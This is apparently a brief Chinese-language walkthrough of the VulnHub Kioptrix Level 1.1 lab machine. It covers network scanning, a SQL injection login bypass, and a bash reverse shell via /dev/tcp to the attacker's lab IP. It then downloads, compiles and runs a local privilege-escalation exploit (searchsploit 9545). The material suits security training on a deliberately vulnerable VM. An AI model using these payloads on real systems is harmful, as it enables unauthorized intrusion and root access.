VulnHub 23 Kioptrix: Level 1.1 (#2)
https://www.vulnhub.com/entry/kioptrix-level-11-2,23/
文件 Kioptrix_Level_2-update.rar
环境
名称 | IP |
---|---|
Kali Linux | 192.168.11.132 |
KIOPTRIX: LEVEL 1.1 (#2) | 192.168.11.128 |
1$ sed -i '/^ethernet0/d' CentOs4.5.vmx
虚拟机人工添加网络适配器,配置nat网络后启动。
打点
1└─$ sudo arp-scan -l
2192.168.11.128 00:0c:29:15:9b:7c (Unknown)
3└─$ export rip=192.168.11.128
4└─$ nmap $rip -p- --min-rate 10000
访问http://192.168.11.128
1' or 1=1 or '
apache
/bin/bash -i >& /dev/tcp/192.168.11.132/445 0>&1
root
└─$ searchsploit -m 9545
└─$ python -m http.server 80
1bash-3.00$ cd /tmp
2bash-3.00$ wget http://192.168.11.132/9545.c
3bash-3.00$ gcc -o 9545 9545.c
4bash-3.00$ ./9545